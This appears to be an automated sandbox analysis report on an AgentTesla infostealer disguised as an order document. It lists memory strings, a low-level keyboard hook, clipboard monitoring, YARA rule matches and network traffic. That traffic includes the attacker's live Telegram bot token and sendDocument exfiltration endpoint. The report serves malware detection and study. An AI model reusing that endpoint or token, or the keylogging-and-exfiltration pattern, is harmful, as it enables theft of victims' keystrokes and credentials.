Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307540852.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349450295.0000000005EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307573750.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307547855.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307630920.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307593958.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmY
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303423712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303953142.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303491476.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303547143.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303113304.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304121403.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303924617.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303459883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303190453.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303711642.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303288048.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304055892.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304005746.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303259684.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303777091.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303357363.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/FL
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/K
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/QO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-eo
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0m
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/hu-h
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/oie.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301411124.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://VEVgTqSNHWikc.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://VEVgTqSNHWikc.orgD
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgMozilla/5.0
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/1644584536appdatamacDpmac
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4
Source: unknown HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WsdnBq.exe
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4_2_06CA3790 SetWindowsHookExW 0000000D,00000000,?,? 4_2_06CA3790
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: initial sample Static PE information: Filename: ORDER (6256 OS)#391 PI.exe
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, <PrivateImplementationDetails>{FD9F610E-7B51-480D-B05A-E55A047CA86A}/991DE117-9CB5-4593-ADFD-17D5BF3CC903.cs Large array initialization: .cctor: array initializer size 9257
Source: ORDER (6256 OS)#391 PI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0160E87F 0_2_0160E87F
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0160E880 0_2_0160E880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0160BFF4 0_2_0160BFF4
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07986698 0_2_07986698
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798A290 0_2_0798A290
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798ACC0 0_2_0798ACC0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079815E0 0_2_079815E0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07985958 0_2_07985958
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798F880 0_2_0798F880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07982348 0_2_07982348
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798ED18 0_2_0798ED18
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798E880 0_2_0798E880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0798F7ED 0_2_0798F7ED
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07991799 0_2_07991799
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799B710 0_2_0799B710
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993F50 0_2_07993F50
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07998678 0_2_07998678
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_0799CD48 0_2_0799CD48
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07998BB0 0_2_07998BB0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07990A08 0_2_07990A08
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07990040 0_2_07990040
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993F40 0_2_07993F40
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079926F0 0_2_079926F0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_079926E2 0_2_079926E2
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07997E1E 0_2_07997E1E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07998669 0_2_07998669
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993528 0_2_07993528
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993D58 0_2_07993D58
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07997D50 0_2_07997D50
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 0_2_07993D48 0_2_07993D48
